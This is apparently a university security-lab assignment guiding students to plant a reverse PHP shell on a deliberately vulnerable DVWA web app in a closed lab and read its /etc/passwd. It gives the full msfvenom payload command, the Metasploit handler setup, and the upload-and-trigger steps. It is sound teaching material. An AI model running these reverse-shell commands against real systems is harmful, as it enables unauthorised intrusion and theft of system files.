Proj 1
jimpop1998
Project1.docxProject-1: Getting a Reverse Shell
In this project, you are assigned the task of stealing /etc/passwd file of OWASP BWA computer in a CTF (Capture-the-Flag) event. You discovered that OWASP BWA has a vulnerable web application. First, you crack the password of the web application, and then you log in to the web application and try to exploit it in a way that allows you to steal the passwd file of the server on which this web app is running.
Reminder
Please skim the specified chapters of the book (Metasploit 5.0 for beginners 2nd ed.) before starting the project.
Computers
Notes:
1) You will perform all of your actions from Kali Linux.
2) You cannot copy and paste between your computer and the computers on Netlab environment; however, it will be both quicker and more reliable if you use your keyboard's tab key after writing the first 2-3 letters of each command/command parameters in Metasploit
3) Use CTRL – to shrink the fonts on Kali Linux terminal windows; alternatively you can click on the View menu and then the Shrink Font menu item.
Steps of Hacking
1. Optional: Crack the password of the admin user of the web application http://192.168.2.15/dvwa/login.php application. (This is the same lab you performed in Lab-7, Section-3)
2. Create a PHP backdoor (reverse PHP shell) by using msfvenom (A tool from Metasploit Framework)
3. Upload the PHP backdoor to the web application (Being able to upload a PHP is yet another vulnerability, easy to exploit, though. You will practice this local file upload vulnerability in detail in Lab-8, Section-2)
4. Prepare a handler on Kali Linux that will wait for the connection requests from the exploited web application and later on send commands to the same web application.
5. Call the reverse shell you uploaded (Open the PHP file on the browser on Kali)
6. Send a command to the vulnerable web application and fetch the /etc/passwd file of the OWASP BWA computer by sending a command (192.168.2.15)
The List of Actions/Commands per Step
|
1. Crack the password of the admin user of the web application |
|
|
This part is optional. If you want to practice is once more, see Lab-7, Section-3. This part has been included in the project for the sake of logical completeness. If this were a real hacking case, the hacker would have to perform this step before the upcoming steps. |
|
|
2. Create a PHP backdoor (reverse shell) |
|
|
Command |
Notes |
|
msfvenom -p php/reverse_php LHOST=192.168.2.10 LPORT=443 -f raw > reverseshell.php |
File created: reverseshell.php |
|
3. Upload PHP backdoor to the DVWA |
|
|
Find the link to upload a file from the left menu after logging into the web app using the cracked password. Refer to the Lab-8, Section-2 instructions to see the solution. |
|
|
4. Prepare a handler on Kali Linux |
|
|
A PHP reverse shell on its own does not allow you to connect to the remote server (OWASP BWA). There should be a corresponding handler that will respond to the connection request from the PHP reverse shell and send commands to the reverse shell. A handler can be regarded as a command and control server. The reverse shell is like the RC car, but it is only the car. The handler is the remote-control unit. Neither of them will work alone. In this analogy, the frequency of the RC unit should be compatible with the frequency of the receiver in the car. Similarly, the parameter of the handler you are creating should be in full harmony with the parameters of the PHP shell. |
|
|
Commands |
Notes |
|
msfconsole |
This command opens the Metasploit Framework. |
|
search handler |
This is an informational command. Just try to find handler among search results |
|
use exploit/multi/handler |
Using a multi/handler, which is a stub that handles exploits launched outside of the framework. (In this case, it is the reverseshell.php file) |
|
set payload php/reverse_php |
Using reverse_php payload for this handler. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy. |
|
show options |
This is yet another informational command. To show the options of the payload |
|
set lhost 192.168.2.10 |
Option-1. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy. |
|
set lport 443 |
Option-2. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy. |
|
exploit |
Run handler |
|
5. Call the reverse shell |
|
|
After uploading the PHP file (in Step-3), the web application returned the path where the reverse shell has been uploaded. Copy that path and append to the URL in a meaningful way and hit enter. |
|
|
6. Send a command to the vulnerable web application and fetch the /etc/passwd file
|
|
|
Switch to the terminal window where you run the handler by exploit command. If you uploaded the PHP file in Step-3 and then called the file in Step-5 accurately, the PHP has already opened a connection to the handler and been waiting for the handler's commands. You should also see the message of handler similar to "Command shell session 1 opened (192.168.2.10:443 -> 192.168.2.15:54585 at YYYY-MM-DD HH:MM:SS +Timezone)”
If you see the message above, send the command to dump the /etc/passwd to the terminal window; there is a standard command in Linux called cat that writes the content of the files to the screen. |
Take a screenshot of the terminal window showing the content of the passwd file.
Weekly Learning and Reflection
In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed, summarize, and interact with the content covered in this project. Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also what you have learned through the session. You can ask questions for the things you're confused about. Questions asked here will be summarized and answered anonymously in the next class.
